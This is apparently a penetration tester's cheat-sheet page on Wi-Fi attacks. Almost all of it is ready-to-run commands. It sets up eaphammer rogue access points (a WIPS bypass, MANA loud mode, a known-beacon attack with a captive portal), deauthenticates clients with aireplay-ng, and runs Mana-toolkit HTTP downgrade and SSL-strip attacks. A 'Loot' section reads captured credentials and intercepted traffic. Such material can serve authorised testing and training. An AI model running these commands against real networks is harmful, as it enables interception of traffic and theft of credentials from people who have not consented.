Mana and Known Beacons

WIPS bypass

Create white list

echo <BSSID> > bssid_targets.txt

Create rogue AP

./eaphammer -i <wlan0> --e <ESSID> --pmf enable --cloaking full --mana --auth <wpa-eap | wpa-psk> --creds --mac-whitelist bssid_targets.txt

As the rogue AP is waiting for probe requests, deauthenticate supplicants

for i in `cat bssid_targets.txt`; do aireplay-ng -0 5 -a <ap_mac> -c $i; done 

MANA loud mode

./eaphammer -i <wlan0> -e <ESSID> --cloaking full --mana --loud

Known beacon attack

./eaphammer -i <wlan0> --mana -e <known_ESSID> --known-beacons --captive-portal --known-ssids-file <list_of_known_ESSID.txt> [--loud]

Mana-toolkit (deprecated) - HTTP downgrade attacks

info

This technique is extremely efficient against old smartphone OS and poorly configured MDM applications. But the MiTM toolset is deprecated so I use an old custom dedicated kali VM.

4.15.0-kali2-amd64
Alfa AWUS036NHA + Alfa 9dBi WiFi Booster
Mana-Toolkit installed with apt

Start Mana - Custom script

/usr/share/mana-toolkit/run-mana/custom.sh

Loot

cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keywork>

cp -r /var/lib/mana-toolkit/sslsplit/ /tmp
bulk_extractor -R /tmp/sslsplit/ -o /tmp/loot
binwalk /tmp/sslsplit/* -e

WIPS bypass​

MANA loud mode​

Known beacon attack​

Mana-toolkit (deprecated) - HTTP downgrade attacks​

WIPS bypass

MANA loud mode

Known beacon attack

Mana-toolkit (deprecated) - HTTP downgrade attacks